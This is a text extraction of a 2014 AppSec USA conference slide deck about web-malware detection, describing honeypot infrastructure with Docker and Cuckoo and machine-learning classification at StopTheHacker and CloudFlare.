AppSec USA 2014 Denver, Colorado Catch me if you can Machine Learning, VMs, honeypots and more..
Jan 02, 2016
Ph.D. CSE – works at CloudFlare
Anirban Banerjee• San Francisco• Web-Malware detection• Machine learning, scalable systems• Interface with hosting industry• Co-Founder of StopTheHacker• Post acquisition at CloudFlare• Interested in malware detection, RE• Various talks at Hostingcon, parallels summit
Introduction
• StopTheHacker• CloudFlare• Web Malware – Existing tools Fail• Web Malware – Attack Vectors• Identification• Scaling honeypots• Machine Learning
Quick Overview
• StopTheHacker– Founded in 2009– Funded by NSF– Identifies, cleans
web-malware automatically
– Partners with hosters– Uses Machine
Learning, pattern matching, AVs, VMs
• CloudFlare– DDoS protection– CDN– WAF– Cloud Solution– Contribute to NGINX– Use Lua, Go– 5->7% of Internet
traffic daily
StopTheHacker - CloudFlare
• AVs– Polymorphic
malware– Checks for AV
processes– Avast, ClamAV, AVG– Linux versions seem
to not be updated as frequently
• Pattern Matching– Trivial to change
code structure– Trivial to change
commands– Yara, Perl, Grep, Awk
Web Malware - Existing Tools Fail
• Via Website– SQL Injection– XSS– Ads– 3rd party libraries– Themes– Plugins
• Bypass – FTP creds– Apache modules– SEO poisoning
Web Malware – Attack Vectors
• Making it a bit harder– Custom WP packages e.g. Dreampress– Auto upgrades– WAFs– Proper separation of web server and CMS roles– End clients must be educated– *Some* default scanning for *every* site• Free to end client
– Web-Malware collaboration group (SBW)
Web Malware – Attack Vectors
Web malware• High churn– Iframe targets– Fast flux networks– Encoded, encrypted,
randomly generated domains
– PhP code changes
Binaries• Low churn– Primarily PE32/Win– Target old IE exploits– Spyware/Adware
more than malware– FTP sniffers, IRC drop
Identification - Highlights
Web malware• Detection is hard– What is malware? Redirection, binary drop,
registry modification..– PhP, ASP, Shell, Perl, Python, Ruby..– Malware is smart: UA, Geo IP, Time of day, only
once per IP..– Blacklists very outdated– AVs have very poor catch rate
Identification – Challenges
Scaling honeypots
Bare Metal
OS
Docker
dev.go.com
Bad Hacker Bad Bot
BLWAF
Front End
Public API
Container
IP, file deposited etc..
Host content, tripwire, analyze binary
WP 3.6.1, 3.7, 2.8, 3.0 Joomla, Drupal, Django – Any flavor we want
Cuckoo based VMWindows binaries and honeypot
Yes• Docker – common library re-use• Spawn thousands of instances on one rack• Any flavor of CMS you like• Watchdog for file system changes• Dropped files shipped off to cuckoo VM• Complete trace, screenshots with specific IE
version
Scaling honeypots - Is this better
Constant Cat and Mouse game• Rotate IPs, avoid customer IPs• Juicy target for DDoS (400 Gigs/s +)• Keep up with new variants• Malware getting smarter, check for VM• Malware targets mobile devices
Scaling honeypots - Challenges
Helps identify the unseen • Need a dataset– Offensive computing, virustotal, blacklists..
• Analyze what is important– Reduce noise– More features is not always better– PCA type experiments– Use rules of thumb – forests/Trees– Scikitpy/pybrain/weka is your friend
Machine Learning
Toolkit strategy• Pybrain– Use for clustering, neural network– Identify what clusters are present
• Scikitpy/weka– Use for classification– Constant retraining needed : high recall, precision– Feedback loop based system is important
Machine Learning
What is the benefit• Fuzzed iframes caught easily• Fuzzed/encoded PHP/JS caught easily• Catches ad misbehavior• Catches binary that is missed by AV but tries
to do “obvious” bad things• Lets move away from signatures
Machine Learning
Is it all roses and honey?• No – constant retraining needed• Has to be able to get large dataset– Features increase, exponential increase in data
• CPU needed• Near-Real-time very hard• Toolkits are good – but can be better
Machine Learning
Right now• Pybrain– Use for clustering, neural network– Identify what clusters are present
• Scikitpy/weka– Use for classification– Constant retraining needed : high recall, precision– Feedback loop based system is important
Current Status and Future Plans
Future Plans• Inline ML for WAF• More focus on mobile malware• More focus on DDoS malware• More focus on using ML – traffic anomalies
Current Status and Future Plans
The road ahead• Make VM detection harder• Use on metal type solution – performance!• Investigate Go for inline traffic processing• Potentially open source portions of code• Automated malware collection at massive
scale
More work needed